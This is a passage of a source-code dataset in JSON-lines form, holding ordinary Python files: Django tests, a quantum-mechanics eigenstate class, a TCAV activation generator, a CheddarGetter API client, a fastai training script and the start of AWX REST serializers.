declined_break_invitation.addressees.connect(user)\n declined_break_invitation.declinees.connect(user)\n\n actual_break_invitations = get_pending_break_invitations(actor=user)\n\n assert unanswered_break_invitation in actual_break_invitations\n assert expired_break_invitation not in actual_break_invitations\n assert accepted_break_invitation not in actual_break_invitations\n assert declined_break_invitation not in actual_break_invitations\n\n\ndef test_get_break_invitations_awaiting_reply_returns_unanswered_invitations_expired_five_minutes_ago(\n user,\n):\n \"\"\"Should return unanswered invitations who's break has started within 5 minutes ago.\"\"\"\n two_minutes_ago = datetime.now(pytz.utc) - timedelta(minutes=2)\n non_expired_break = BreakFactory()\n non_expired_break.starting_at = two_minutes_ago\n non_expired_break.save()\n non_expired_break_invitation = BreakInvitationFactory()\n non_expired_break_invitation.subject.connect(non_expired_break)\n non_expired_break_invitation.addressees.connect(user)\n\n ten_minutes_ago = datetime.now(pytz.utc) - timedelta(minutes=10)\n expired_break = BreakFactory()\n expired_break.starting_at = ten_minutes_ago\n expired_break.save()\n expired_break_invitation = BreakInvitationFactory()\n expired_break_invitation.subject.connect(expired_break)\n expired_break_invitation.addressees.connect(user)\n\n actual_break_invitations = get_pending_break_invitations(actor=user)\n\n assert non_expired_break_invitation in actual_break_invitations\n assert expired_break_invitation not in actual_break_invitations\n"} {"ext": "py", "sha": "1a2ea6f5dd39841efa40a1e50731abfd2df8685c", "content": "import numpy as np\nfrom scipy.sparse import diags\nfrom scipy.sparse import kron\nfrom scipy.sparse import eye\nfrom .two_particles import TwoParticles\nfrom ..util.constants import *\nfrom .. import Eigenstates\n\n\nclass TwoFermions(TwoParticles):\n\n\n def get_eigenstates(self, H, max_states, eigenvalues, eigenvectors):\n\n eigenvectors = eigenvectors.T.reshape(( max_states, *[H.N]*H.ndim) )\n\n # Normalize the eigenvectors\n eigenvectors = eigenvectors/np.sqrt(H.dx**H.ndim)\n \n\n energies = []\n eigenstates_array = []\n\n #antisymmetrize eigenvectors: This is made by applying (𝜓(r1 , s1, r2 , s2) - 𝜓(r2 , s2, r1 , s1))/sqrt(2) to each state.\n for i in range(max_states):\n eigenstate_tmp = (eigenvectors[i] - eigenvectors[i].swapaxes(0,1))/np.sqrt(2)\n\n norm = np.sum(eigenstate_tmp*eigenstate_tmp)*H.dx**H.ndim \n\n TOL = 0.02\n \n # check if is eigenstate_tmp is a normalizable eigenstate. (norm shouldn't be zero)\n if norm > TOL : \n # for some reason when the eigenstate is degenerated it isn't normalized \n #print(\"norm\",norm)\n eigenstate_tmp = eigenstate_tmp/np.sqrt(norm)\n\n \n if eigenstates_array != []: #check if it's the first eigenstate\n inner_product = np.sum(eigenstates_array[-1]* eigenstate_tmp)*H.dx**H.ndim\n #print(\"inner_product\",inner_product)\n else:\n inner_product = 0\n\n\n if np.abs(inner_product) < TOL: # check if is eigenstate_tmp is repeated. 
(inner_product should be zero)\n\n eigenstates_array += [eigenstate_tmp]\n energies += [eigenvalues[i]]\n\n if H.spatial_ndim == 1:\n type = \"TwoIdenticalParticles1D\"\n elif H.spatial_ndim == 2:\n type = \"TwoIdenticalParticles2D\"\n\n eigenstates = Eigenstates(energies, eigenstates_array, H.extent, H.N, type)\n return eigenstates"} {"ext": "py", "sha": "1a2ea70915788a9b5c94a3368918c20c33a3fba8", "content": "from .Helper import StudyManage,StageControl\nfrom .Helper.StageControl import CStageControl \nfrom .DataStruct.DataSet import CFlowDict\n"} {"ext": "py", "sha": "1a2ea73f55442ae5ef4c6061276deb17c954c9ee", "content": "#!/usr/bin/env python\n\nfrom distutils.core import setup\nfrom catkin_pkg.python_setup import generate_distutils_setup\n\nd = generate_distutils_setup(\n ## don't do this unless you want a globally visible script\n # scripts=['bin/myscript'], \n packages=['rqt_smach'],\n package_dir={'': 'src'},\n scripts=['scripts/rqt_smach']\n)\n\nsetup(**d)\n\n"} {"ext": "py", "sha": "1a2ea7930e307d1b563ec44c435e5d27b999a6bf", "content": "\"\"\"\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\"\"\" Activation generator helper classes for TCAV\"\"\"\n\n'''\n The following class was modified to enable numeric class labels\n'''\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom multiprocessing import dummy as multiprocessing\nimport os.path\nimport numpy as np\nimport PIL.Image\nimport tensorflow as tf\n\n\nclass ActivationGeneratorInterface(object):\n \"\"\"Interface for an activation generator for a model\"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def process_and_load_activations(self, bottleneck_names, concepts):\n pass\n\n @abstractmethod\n def get_model(self):\n pass\n\n\nclass ActivationGeneratorBase(ActivationGeneratorInterface):\n \"\"\"Basic abstract activation generator for a model\"\"\"\n\n def __init__(self, model, acts_dir, max_examples=500):\n self.model = model\n self.acts_dir = acts_dir\n self.max_examples = max_examples\n\n def get_model(self):\n return self.model\n\n @abstractmethod\n def get_examples_for_concept(self, concept):\n pass\n\n def get_activations_for_concept(self, concept, bottleneck):\n examples = self.get_examples_for_concept(concept)\n return self.get_activations_for_examples(examples, bottleneck)\n\n def get_activations_for_examples(self, examples, bottleneck):\n acts = self.model.run_examples(examples, bottleneck)\n return self.model.reshape_activations(acts).squeeze()\n\n def process_and_load_activations(self, bottleneck_names, concepts):\n acts = {}\n if self.acts_dir and not tf.gfile.Exists(self.acts_dir):\n tf.gfile.MakeDirs(self.acts_dir)\n\n for concept in concepts:\n if concept not in acts:\n acts[concept] = {}\n for bottleneck_name in bottleneck_names:\n acts_path = os.path.join(self.acts_dir, 'acts_{}_{}'.format(\n concept, bottleneck_name)) if self.acts_dir else None\n if acts_path and tf.gfile.Exists(acts_path):\n with tf.gfile.Open(acts_path, 'rb') as f:\n acts[concept][bottleneck_name] = 
np.load(f).squeeze()\n tf.logging.info('Loaded {} shape {}'.format(\n acts_path, acts[concept][bottleneck_name].shape))\n else:\n acts[concept][bottleneck_name] = self.get_activations_for_concept(\n concept, bottleneck_name)\n if acts_path:\n tf.logging.info('{} does not exist, Making one...'.format(\n acts_path))\n with tf.gfile.Open(acts_path, 'wb') as f:\n np.save(f, acts[concept][bottleneck_name], allow_pickle=False)\n return acts\n\n\nclass ImageActivationGenerator(ActivationGeneratorBase):\n \"\"\"Activation generator for a basic image model\"\"\"\n\n def __init__(self, model, source_dir, acts_dir, max_examples=10):\n self.source_dir = source_dir\n super(ImageActivationGenerator, self).__init__(\n model, acts_dir, max_examples)\n\n def get_examples_for_concept(self, concept):\n concept_dir = os.path.join(self.source_dir, concept)\n print(concept_dir, concept)\n img_paths = [os.path.join(concept_dir, d)\n for d in tf.gfile.ListDirectory(concept_dir)]\n imgs = self.load_images_from_files(img_paths, self.max_examples,\n shape=self.model.get_image_shape()[:2])\n return imgs\n\n def load_image_from_file(self, filename, shape):\n \"\"\"Given a filename, try to open the file. If failed, return None.\n\n Args:\n filename: location of the image file\n shape: the shape of the image file to be scaled\n\n Returns:\n the image if succeeds, None if fails.\n\n Rasies:\n exception if the image was not the right shape.\n \"\"\"\n if not tf.gfile.Exists(filename):\n tf.logging.error('Cannot find file: {}'.format(filename))\n return None\n try:\n img = np.array(PIL.Image.open(tf.gfile.Open(filename, 'rb')).resize(\n shape, PIL.Image.BILINEAR))\n # Normalize pixel values to between 0 and 1.\n img = np.float32(img) / 255.0\n if not (len(img.shape) == 3 and img.shape[2] == 3):\n return None\n else:\n return img\n\n except Exception as e:\n tf.logging.info(e)\n return None\n return img\n\n def load_images_from_files(self, filenames, max_imgs=500,\n do_shuffle=True, run_parallel=True,\n shape=(299, 299),\n num_workers=100):\n \"\"\"Return image arrays from filenames.\n\n Args:\n filenames: locations of image files.\n max_imgs: maximum number of images from filenames.\n do_shuffle: before getting max_imgs files, shuffle the names or not\n run_parallel: get images in parallel or not\n shape: desired shape of the image\n num_workers: number of workers in parallelization.\n\n Returns:\n image arrays\n\n \"\"\"\n imgs = []\n # First shuffle a copy of the filenames.\n filenames = filenames[:]\n if do_shuffle:\n np.random.shuffle(filenames)\n\n if run_parallel:\n pool = multiprocessing.Pool(num_workers)\n imgs = pool.map(\n lambda filename: self.load_image_from_file(filename, shape),\n filenames[:max_imgs])\n imgs = [img for img in imgs if img is not None]\n else:\n for filename in filenames:\n img = self.load_image_from_file(filename, shape)\n if img is not None:\n imgs.append(img)\n if len(imgs) >= max_imgs:\n break\n\n return np.array(imgs)\n"} {"ext": "py", "sha": "1a2ea9756620b796158af7da3296c4fe6127c95d", "content": "import base64\nimport logging\nfrom urllib import urlencode\nfrom dateutil.tz import tzutc\nimport httplib2\n\nfrom sharpy.exceptions import AccessDenied\nfrom sharpy.exceptions import BadRequest\nfrom sharpy.exceptions import CheddarError\nfrom sharpy.exceptions import CheddarFailure\nfrom sharpy.exceptions import NaughtyGateway\nfrom sharpy.exceptions import NotFound\nfrom sharpy.exceptions import PreconditionFailed\nfrom sharpy.exceptions import UnprocessableEntity\n\nclient_log = 
logging.getLogger('SharpyClient')\n\n\nclass Client(object):\n default_endpoint = 'https://cheddargetter.com/xml'\n\n def __init__(self, username, password, product_code, cache=None,\n timeout=None, endpoint=None):\n '''\n username - Your cheddargetter username (probably an email address)\n password - Your cheddargetter password\n product_code - The product code for the product you want to work with\n cache - A file system path or an object which implements the httplib2\n cache API (optional)\n timeout - Socket level timout in seconds (optional)\n endpoint - An alternate API endpoint (optional)\n '''\n self.username = username\n self.password = password\n self.product_code = product_code\n self.endpoint = endpoint or self.default_endpoint\n self.cache = cache\n self.timeout = timeout\n\n super(Client, self).__init__()\n\n def build_url(self, path, params=None):\n '''\n Constructs the url for a cheddar API resource\n '''\n url = u'%s/%s/productCode/%s' % (\n self.endpoint,\n path,\n self.product_code,\n )\n if params:\n for key, value in params.items():\n url = u'%s/%s/%s' % (url, key, value)\n\n return url\n\n def format_datetime(self, to_format):\n if to_format == 'now':\n str_dt = to_format\n else:\n if getattr(to_format, 'tzinfo', None) is not None:\n utc_value = to_format.astimezone(tzutc())\n else:\n utc_value = to_format\n str_dt = utc_value.strftime('%Y-%m-%dT%H:%M:%S+00:00')\n return str_dt\n\n def format_date(self, to_format):\n if to_format == 'now':\n str_dt = to_format\n else:\n if getattr(to_format, 'tzinfo', None) is not None:\n utc_value = to_format.astimezone(tzutc())\n else:\n utc_value = to_format\n str_dt = utc_value.strftime('%Y-%m-%d')\n return str_dt\n\n def make_request(self, path, params=None, data=None, method=None):\n '''\n Makes a request to the cheddar api using the authentication and\n configuration settings available.\n '''\n # Setup values\n url = self.build_url(path, params)\n client_log.debug('Requesting: %s' % url)\n method = method or 'GET'\n body = None\n headers = {}\n cleaned_data = None\n\n if data:\n method = 'POST'\n body = urlencode(data)\n headers = {\n 'content-type':\n 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n\n # Clean credit card info from when the request gets logged\n # (remove ccv and only show last four of card num)\n cleaned_data = data.copy()\n if 'subscription[ccCardCode]' in cleaned_data:\n del cleaned_data['subscription[ccCardCode]']\n if 'subscription[ccNumber]' in cleaned_data:\n ccNum = cleaned_data['subscription[ccNumber]']\n cleaned_data['subscription[ccNumber]'] = ccNum[-4:]\n\n client_log.debug('Request Method: %s' % method)\n client_log.debug('Request Body (Cleaned Data): %s' % cleaned_data)\n\n # Setup http client\n h = httplib2.Http(cache=self.cache, timeout=self.timeout)\n # Skip the normal http client behavior and send auth headers\n # immediately to save an http request.\n headers['Authorization'] = \"Basic %s\" % base64.standard_b64encode(\n self.username + ':' + self.password).strip()\n\n # Make request\n response, content = h.request(url, method, body=body, headers=headers)\n status = response.status\n client_log.debug('Response Status: %d' % status)\n client_log.debug('Response Content: %s' % content)\n if status != 200 and status != 302:\n exception_class = CheddarError\n if status == 401:\n exception_class = AccessDenied\n elif status == 400:\n exception_class = BadRequest\n elif status == 404:\n exception_class = NotFound\n elif status == 412:\n exception_class = PreconditionFailed\n elif status == 
500:\n exception_class = CheddarFailure\n elif status == 502:\n exception_class = NaughtyGateway\n elif status == 422:\n exception_class = UnprocessableEntity\n\n raise exception_class(response, content)\n\n response.content = content\n return response\n"} {"ext": "py", "sha": "1a2eaa285371140e1b57d39a53c34529b0e71209", "content": "from fastbook import *\nfrom fastai.vision.widgets import *\n\n\ndef create_dataloader(path):\n \n print(\" Creating dataloader.. \")\n db = DataBlock(\n blocks=(ImageBlock, CategoryBlock), \n get_items=get_image_files, \n splitter=RandomSplitter(valid_pct=0.2, seed=42),\n get_y=parent_label,\n item_tfms=Resize(128))\n\n db = db.new(\n item_tfms=RandomResizedCrop(224, min_scale=0.5),\n batch_tfms=aug_transforms())\n\n dls = db.dataloaders(path)\n return dls\n\ndef train_model(dls , save_model_name = \"animals_prediction.pkl\"):\n\n print(\" Training Model .. \")\n learn = cnn_learner(dls, resnet18, metrics=error_rate)\n learn.fine_tune(4)\n learn.export(save_model_name)\n return learn\n\n\nif __name__ == \"__main__\":\n path = Path(\"DATA\")\n animals_path = (path/\"animals\")\n dls = create_dataloader(animals_path)\n model = train_model(dls ,\"animals_prediction.pkl\")\n\n"} {"ext": "py", "sha": "1a2eaa6573349bf9471d42646a7167c9f0a978c9", "content": "# -*- coding: utf-8 -*-\nimport argparse\n\n\ndef parse_opts():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-videos_path',\n nargs='+',\n type=str,\n help='视频所在文件夹')\n parser.add_argument(\n '-target_path',\n nargs='+',\n type=str,\n help='要写入的文件夹')\n parser.add_argument(\n '-cut_start',\n nargs='+',\n default=0,\n type=int,\n help='从第几帧开始截取')\n parser.add_argument(\n '-cut_end',\n nargs='+',\n default=0,\n type=int,\n help='截取到第几帧')\n args = parser.parse_args()\n\n return args\n"} {"ext": "py", "sha": "1a2eaaea2d5e98378645ecfb7ae2cc544a174dad", "content": "# Copyright (c) 2015 Ansible, Inc.\n# All Rights Reserved.\n\n# Python\nimport copy\nimport json\nimport logging\nimport re\nfrom collections import OrderedDict\nfrom datetime import timedelta\n\n# OAuth2\nfrom oauthlib import oauth2\nfrom oauthlib.common import generate_token\n\n# Django\nfrom django.conf import settings\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError as DjangoValidationError\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import force_text\nfrom django.utils.text import capfirst\nfrom django.utils.timezone import now\nfrom django.utils.functional import cached_property\n\n# Django REST Framework\nfrom rest_framework.exceptions import ValidationError, PermissionDenied\nfrom rest_framework.relations import ManyRelatedField\nfrom rest_framework import fields\nfrom rest_framework import serializers\nfrom rest_framework import validators\nfrom rest_framework.utils.serializer_helpers import ReturnList\n\n# Django-Polymorphic\nfrom polymorphic.models import PolymorphicModel\n\n# AWX\nfrom awx.main.access import get_user_capabilities\nfrom awx.main.constants import (\n SCHEDULEABLE_PROVIDERS,\n ANSI_SGR_PATTERN,\n ACTIVE_STATES,\n CENSOR_VALUE,\n)\nfrom awx.main.models import (\n ActivityStream, AdHocCommand, AdHocCommandEvent, Credential, CredentialInputSource,\n CredentialType, CustomInventoryScript, Group, Host, Instance,\n InstanceGroup, Inventory, InventorySource, 
InventoryUpdate,\n InventoryUpdateEvent, Job, JobEvent, JobHostSummary, JobLaunchConfig,\n JobTemplate, Label, Notification, NotificationTemplate,\n OAuth2AccessToken, OAuth2Application, Organization, Project,\n ProjectUpdate, ProjectUpdateEvent, RefreshToken, Role, Schedule,\n SystemJob, SystemJobEvent, SystemJobTemplate, Team, UnifiedJob,\n UnifiedJobTemplate, WorkflowJob, WorkflowJobNode,\n WorkflowJobTemplate, WorkflowJobTemplateNode, StdoutMaxBytesExceeded\n)\nfrom awx.main.models.base import VERBOSITY_CHOICES, NEW_JOB_TYPE_CHOICES\nfrom awx.main.models.rbac import (\n get_roles_on_resource, role_summary_fields_generator\n)\nfrom awx.main.fields import ImplicitRoleField, JSONBField\nfrom awx.main.utils import (\n get_type_for_model, get_model_for_type,\n camelcase_to_underscore, getattrd, parse_yaml_or_json,\n has_model_field_prefetched, extract_ansible_vars, encrypt_dict,\n prefetch_page_capabilities, get_external_account)\nfrom awx.main.utils.filters import SmartFilter\nfrom awx.main.redact import UriCleaner, REPLACE_STR\n\nfrom awx.main.validators import vars_validate_or_raise\n\nfrom awx.api.versioning import reverse\nfrom awx.api.fields import (BooleanNullField, CharNullField, ChoiceNullField,\n VerbatimField, DeprecatedCredentialField)\n\nlogger = logging.getLogger('awx.api.serializers')\n\n# Fields that should be summarized regardless of object type.\nDEFAULT_SUMMARY_FIELDS = ('id', 'name', 'description')# , 'created_by', 'modified_by')#, 'type')\n\n# Keys are fields (foreign keys) where, if found on an instance, summary info\n# should be added to the serialized data. Values are a tuple of field names on\n# the related object to include in the summary data (if the field is present on\n# the related object).\nSUMMARIZABLE_FK_FIELDS = {\n 'organization': DEFAULT_SUMMARY_FIELDS,\n 'user': ('id', 'username', 'first_name', 'last_name'),\n 'application': ('id', 'name'),\n 'team': DEFAULT_SUMMARY_FIELDS,\n 'inventory': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'total_hosts',\n 'hosts_with_active_failures',\n 'total_groups',\n 'groups_with_active_failures',\n 'has_inventory_sources',\n 'total_inventory_sources',\n 'inventory_sources_with_failures',\n 'organization_id',\n 'kind',\n 'insights_credential_id',),\n 'host': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'has_inventory_sources'),\n 'group': DEFAULT_SUMMARY_FIELDS + ('has_active_failures',\n 'total_hosts',\n 'hosts_with_active_failures',\n 'total_groups',\n 'groups_with_active_failures',\n 'has_inventory_sources'),\n 'project': DEFAULT_SUMMARY_FIELDS + ('status', 'scm_type'),\n 'source_project': DEFAULT_SUMMARY_FIELDS + ('status', 'scm_type'),\n 'project_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed',),\n 'credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n 'job': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'elapsed', 'type'),\n 'job_template': DEFAULT_SUMMARY_FIELDS,\n 'workflow_job_template': DEFAULT_SUMMARY_FIELDS,\n 'workflow_job': DEFAULT_SUMMARY_FIELDS,\n 'schedule': DEFAULT_SUMMARY_FIELDS + ('next_run',),\n 'unified_job_template': DEFAULT_SUMMARY_FIELDS + ('unified_job_type',),\n 'last_job': DEFAULT_SUMMARY_FIELDS + ('finished', 'status', 'failed', 'license_error'),\n 'last_job_host_summary': DEFAULT_SUMMARY_FIELDS + ('failed',),\n 'last_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'license_error'),\n 'current_update': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 'license_error'),\n 'current_job': DEFAULT_SUMMARY_FIELDS + ('status', 'failed', 
'license_error'),\n 'inventory_source': ('source', 'last_updated', 'status'),\n 'custom_inventory_script': DEFAULT_SUMMARY_FIELDS,\n 'source_script': ('name', 'description'),\n 'role': ('id', 'role_field'),\n 'notification_template': DEFAULT_SUMMARY_FIELDS,\n 'instance_group': {'id', 'name', 'controller_id'},\n 'insights_credential': DEFAULT_SUMMARY_FIELDS,\n 'source_credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n 'target_credential': DEFAULT_SUMMARY_FIELDS + ('kind', 'cloud', 'credential_type_id'),\n}\n\n\ndef reverse_gfk(content_object, request):\n '''\n Computes a reverse for a GenericForeignKey field.\n\n Returns a dictionary of the form\n { '': reverse() }\n for example\n { 'organization': '/api/v2/organizations/1/' }\n '''\n if content_object is None or not hasattr(content_object, 'get_absolute_url'):\n return {}\n\n return {\n camelcase_to_underscore(content_object.__class__.__name__): content_object.get_absolute_url(request=request)\n }\n\n\nclass CopySerializer(serializers.Serializer):\n\n name = serializers.CharField()\n\n def validate(self, attrs):\n name = attrs.get('name')\n view = self.context.get('view', None)\n obj = view.get_object()\n if name == obj.name:\n raise serializers.ValidationError(_(\n 'The original object is already named {}, a copy from'\n ' it cannot have the same name.'.format(name)\n ))\n return attrs\n\n\nclass BaseSerializerMetaclass(serializers.SerializerMetaclass):\n '''\n Custom metaclass to enable attribute inheritance from Meta objects on\n serializer base classes.\n\n Also allows for inheriting or updating field lists from base class(es):\n\n class Meta:\n\n # Inherit all fields from base class.\n fields = ('*',)\n\n # Inherit all fields from base class and add 'foo'.\n fields = ('*', 'foo')\n\n # Inherit all fields from base class except 'bar'.\n fields = ('*', '-bar')\n\n # Define fields as 'foo' and 'bar'; ignore base class fields.\n fields = ('foo', 'bar')\n\n # Extra field kwargs dicts are also merged from base classes.\n extra_kwargs = {\n 'foo': {'required': True},\n 'bar': {'read_only': True},\n }\n\n # If a subclass were to define extra_kwargs as:\n extra_kwargs = {\n 'foo': {'required': False, 'default': ''},\n 'bar': {'label': 'New Label for Bar'},\n }\n\n # The resulting value of extra_kwargs would be:\n extra_kwargs = {\n 'foo': {'required': False, 'default': ''},\n 'bar': {'read_only': True, 'label': 'New Label for Bar'},\n }\n\n # Extra field kwargs cannot be removed in subclasses, only replaced.\n\n '''\n\n @staticmethod\n def _is_list_of_strings(x):\n return isinstance(x, (list, tuple)) and all([isinstance(y, str) for y in x])\n\n @staticmethod\n def _is_extra_kwargs(x):\n return isinstance(x, dict) and all([isinstance(k, str) and isinstance(v, dict) for k,v in x.items()])\n\n @classmethod\n def _update_meta(cls, base, meta, other=None):\n for attr in dir(other):\n if attr.startswith('_'):\n continue\n val = getattr(other, attr)\n meta_val = getattr(meta, attr, None)\n # Special handling for lists/tuples of strings (field names).\n if cls._is_list_of_strings(val) and cls._is_list_of_strings(meta_val or []):\n meta_val = meta_val or []\n new_vals = []\n except_vals = []\n if base: # Merge values from all bases.\n new_vals.extend([x for x in meta_val])\n for v in val:\n if not base and v == '*': # Inherit all values from previous base(es).\n new_vals.extend([x for x in meta_val])\n elif not base and v.startswith('-'): # Except these values.\n except_vals.append(v[1:])\n else:\n new_vals.append(v)\n val 
= []\n for v in new_vals:\n if v not in except_vals and v not in val:\n val.append(v)\n val = tuple(val)\n # Merge extra_kwargs dicts from base classes.\n elif cls._is_extra_kwargs(val) and cls._is_extra_kwargs(meta_val or {}):\n meta_val = meta_val or {}\n new_val = {}\n if base:\n for k,v in meta_val.items():\n new_val[k] = copy.deepcopy(v)\n for k,v in val.items():\n new_val.setdefault(k, {}).update(copy.deepcopy(v))\n val = new_val\n # Any other values are copied in case they are mutable objects.\n else:\n val = copy.deepcopy(val)\n setattr(meta, attr, val)\n\n def __new__(cls, name, bases, attrs):\n meta = type('Meta', (object,), {})\n for base in bases[::-1]:\n cls._update_meta(base, meta, getattr(base, 'Meta', None))\n cls._update_meta(None, meta, attrs.get('Meta', meta))\n attrs['Meta'] = meta\n return super(BaseSerializerMetaclass, cls).__new__(cls, name, bases, attrs)\n\n\nclass BaseSerializer(serializers.ModelSerializer, metaclass=BaseSerializerMetaclass):\n\n class Meta:\n fields = ('id', 'type', 'url', 'related', 'summary_fields', 'created',\n 'modified', 'name', 'description')\n summary_fields = ()\n summarizable_fields = ()\n\n # add the URL and related resources\n type = serializers.SerializerMethodField()\n url = serializers.SerializerMethodField()\n related = serializers.SerializerMethodField('_get_related')\n summary_fields = serializers.SerializerMethodField('_get_summary_fields')\n\n # make certain fields read only\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super(BaseSerializer, self).__init__(*args, **kwargs)\n # The following lines fix the problem of being able to pass JSON dict into PrimaryKeyRelatedField.\n data = kwargs.get('data', False)\n if data:\n for field_name, field_instance in self.fields.items():\n if isinstance(field_instance, ManyRelatedField) and not field_instance.read_only:\n if isinstance(data.get(field_name, False), dict):\n raise serializers.ValidationError(_('Cannot use dictionary for %s' % field_name))\n\n @property\n def version(self):\n return 2\n\n def get_type(self, obj):\n return get_type_for_model(self.Meta.model)\n\n def get_types(self):\n return [self.get_type(None)]\n\n def get_type_choices(self):\n type_name_map = {\n 'job': _('Playbook Run'),\n 'ad_hoc_command': _('Command'),\n 'project_update': _('SCM Update'),\n 'inventory_update': _('Inventory Sync'),\n 'system_job': _('Management Job'),\n 'workflow_job': _('Workflow Job'),\n 'workflow_job_template': _('Workflow Template'),\n 'job_template': _('Job Template')\n }\n choices = []\n for t in self.get_types():\n name = _(type_name_map.get(t, force_text(get_model_for_type(t)._meta.verbose_name).title()))\n choices.append((t, name))\n return choices\n\n def get_url(self, obj):\n if obj is None or not hasattr(obj, 'get_absolute_url'):\n return ''\n elif isinstance(obj, User):\n return self.reverse('api:user_detail', kwargs={'pk': obj.pk})\n else:\n return obj.get_absolute_url(request=self.context.get('request'))\n\n def filter_field_metadata(self, fields, method):\n \"\"\"\n Filter field metadata based on the request method.\n This it intended to be extended by subclasses.\n \"\"\"\n return fields\n\n def _get_related(self, obj):\n return {} if obj is None else self.get_related(obj)\n\n def _generate_named_url(self, url_path, obj, node):\n url_units = url_path.split('/')\n named_url = node.generate_named_url(obj)\n url_units[4] = named_url\n return '/'.join(url_units)\n\n def get_related(self, 
obj):\n res = OrderedDict()\n view = self.context.get('view', None)\n if view and (hasattr(view, 'retrieve') or view.request.method == 'POST') and \\\n type(obj) in settings.NAMED_URL_GRAPH:\n original_url = self.get_url(obj)\n res['named_url'] = self._generate_named_url(\n original_url, obj, settings.NAMED_URL_GRAPH[type(obj)]\n )\n if getattr(obj, 'created_by', None):\n res['created_by'] = self.reverse('api:user_detail', kwargs={'pk': obj.created_by.pk})\n if getattr(obj, 'modified_by', None):\n res['modified_by'] = self.reverse('api:user_detail', kwargs={'pk': obj.modified_by.pk})\n return res\n\n def _get_summary_fields(self, obj):\n return {} if obj is None else self.get_summary_fields(obj)\n\n def get_summary_fields(self, obj):\n # Return values for certain fields on related objects, to simplify\n # displaying lists of items without additional API requests.\n summary_fields = OrderedDict()\n for fk, related_fields in SUMMARIZABLE_FK_FIELDS.items():\n try:\n # A few special cases where we don't want to access the field\n # because it results in additional queries.\n if fk == 'job' and isinstance(obj, UnifiedJob):\n continue\n if fk == 'project' and (isinstance(obj, InventorySource) or\n isinstance(obj, Project)):\n continue\n\n try:\n fkval = getattr(obj, fk, None)\n except ObjectDoesNotExist:\n continue\n if fkval is None:\n continue\n if fkval == obj:\n continue\n summary_fields[fk] = OrderedDict()\n for field in related_fields:\n\n fval = getattr(fkval, field, None)\n\n if fval is None and field == 'type':\n if isinstance(fkval, PolymorphicModel):\n fkval = fkval.get_real_instance()\n fval = get_type_for_model(fkval)\n elif fval is None and field == 'unified_job_type' and isinstance(fkval, UnifiedJobTemplate):\n fkval = fkval.get_real_instance()\n fval = get_type_for_model(fkval._get_unified_job_class())\n if fval is not None:\n summary_fields[fk][field] = fval\n # Can be raised by the reverse accessor for a OneToOneField.\n except ObjectDoesNotExist:\n pass\n if getattr(obj, 'created_by', None):\n summary_fields['created_by'] = OrderedDict()\n for field in SUMMARIZABLE_FK_FIELDS['user']:\n summary_fields['created_by'][field] = getattr(obj.created_by, field)\n if getattr(obj, 'modified_by', None):\n summary_fields['modified_by'] = OrderedDict()\n for field in SUMMARIZABLE_FK_FIELDS['user']:\n summary_fields['modified_by'][field] = getattr(obj.modified_by, field)\n\n # RBAC summary fields\n roles = {}\n for field in obj._meta.get_fields():\n if type(field) is ImplicitRoleField:\n roles[field.name] = role_summary_fields_generator(obj, field.name)\n if len(roles) > 0:\n summary_fields['object_roles'] = roles\n\n # Advance display of RBAC capabilities\n if hasattr(self, 'show_capabilities'):\n user_capabilities = self._obj_capability_dict(obj)\n if user_capabilities:\n summary_fields['user_capabilities'] = user_capabilities\n\n return summary_fields\n\n def _obj_capability_dict(self, obj):\n \"\"\"\n Returns the user_capabilities dictionary for a single item\n If inside of a list view, it runs the prefetching algorithm for\n the entire current page, saves it into context\n \"\"\"\n view = self.context.get('view', None)\n parent_obj = None\n if view and hasattr(view, 'parent_model') and hasattr(view, 'get_parent_object'):\n parent_obj = view.get_parent_object()\n if view and view.request and view.request.user:\n capabilities_cache = {}\n # if serializer has parent, it is ListView, apply page capabilities prefetch\n if self.parent and hasattr(self, 'capabilities_prefetch') and 
self.capabilities_prefetch:\n qs = self.parent.instance\n if 'capability_map' not in self.context:\n if hasattr(self, 'polymorphic_base'):\n model = self.polymorphic_base.Meta.model\n prefetch_list = self.polymorphic_base._capabilities_prefetch\n else:\n model = self.Meta.model\n prefetch_list = self.capabilities_prefetch\n self.context['capability_map'] = prefetch_page_capabilities(\n model, qs, prefetch_list, view.request.user\n )\n if obj.id in self.context['capability_map']:\n capabilities_cache = self.context['capability_map'][obj.id]\n return get_user_capabilities(\n view.request.user, obj, method_list=self.show_capabilities, parent_obj=parent_obj,\n capabilities_cache=capabilities_cache\n )\n else:\n # Contextual information to produce user_capabilities doesn't exist\n return {}\n\n def get_created(self, obj):\n if obj is None:\n return None\n elif isinstance(obj, User):\n return obj.date_joined\n elif hasattr(obj, 'created'):\n return obj.created\n return None\n\n def get_modified(self, obj):\n if obj is None:\n return None\n elif isinstance(obj, User):\n return obj.last_login # Not actually exposed for User.\n elif hasattr(obj, 'modified'):\n return obj.modified\n return None\n\n def get_extra_kwargs(self):\n extra_kwargs = super(BaseSerializer, self).get_extra_kwargs()\n if self.instance:\n read_only_on_update_fields = getattr(self.Meta, 'read_only_on_update_fields', tuple())\n for field_name in read_only_on_update_fields:\n kwargs = extra_kwargs.get(field_name, {})\n kwargs['read_only'] = 